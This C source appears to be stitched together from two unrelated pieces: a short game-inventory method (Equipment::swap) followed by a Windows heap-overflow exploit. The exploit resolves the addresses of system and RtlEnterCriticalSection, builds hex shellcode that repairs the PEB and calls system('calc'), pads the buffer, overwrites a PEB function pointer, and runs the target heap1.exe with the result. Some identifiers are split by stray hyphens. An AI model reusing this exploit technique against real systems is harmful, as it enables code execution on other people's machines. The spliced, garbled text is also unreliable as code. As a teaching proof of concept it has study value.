bool Equipment::swap(Item* item, Item** resultItem)
{
if (_type != item->getEquipType()) return false;
if (isEquipped())
{
//resultItem* = _item;
undress(resultItem);
}
return dress(item);
}
int main()
{
unsigned char buffer[300]="";
unsigned char heap[8]="";
unsigned char pebf[8]="";
unsigned char shellcode[200]="";
unsigned int address_of_system = 0;
unsigned int address_of_RtlEnterCriticalSection = 0;
unsigned char tmp[8]="";
unsigned int cnt = 0;
printf("Getting addresses...\n");
address_of_system = GetAddress("msvcrt.dll","system");
address_of_RtlEnterCriticalSection = GetAd-dress("ntdll.dll","RtlEnterCriticalSection");
if(address_of_system == 0 || ad-dress_of_RtlEnterCriticalSection == 0)
return printf("Failed to get addresses\n");
printf("Address of msvcrt.system\t\t\t= %.8X\n",address_of_system);
printf("Address of ntdll.RtlEnterCriticalSection\t= %.8X\n",address_of_RtlEnterCriticalSection);
strcpy(buffer,"heap1 ");
// Shellcode - repairs the PEB then calls system("calc");
strcat(buffer,"\"\x90\x90\x90\x90\x01\x90\x90\x6A\x30\x59\x64\x8B\x01\xB9");
fixupaddresses(tmp,address_of_RtlEnterCriticalSection);
strcat(buffer,tmp);
strcat(buffer,"\x89\x48\x20\x33\xC0\x50\x68\x63\x61\x6C\x63\x54\x5B\x50\x53\xB9");
fixupaddresses(tmp,address_of_system);
strcat(buffer,tmp);
strcat(buffer,"\xFF\xD1");
// Padding
while(cnt < 58)
{
strcat(buffer,"DDDD");
cnt ++;
}
// Pointer to RtlEnterCriticalSection pointer - 4 in PEB
strcat(buffer,"\x1C\xF0\xFD\x7f");
// Pointer to heap and thus shellcode
strcat(buffer,"\x88\x06\x35");
strcat(buffer,"\"");
printf("\nExecuting heap1.exe... calc should open.\n");
system(buffer);
return 0;
}
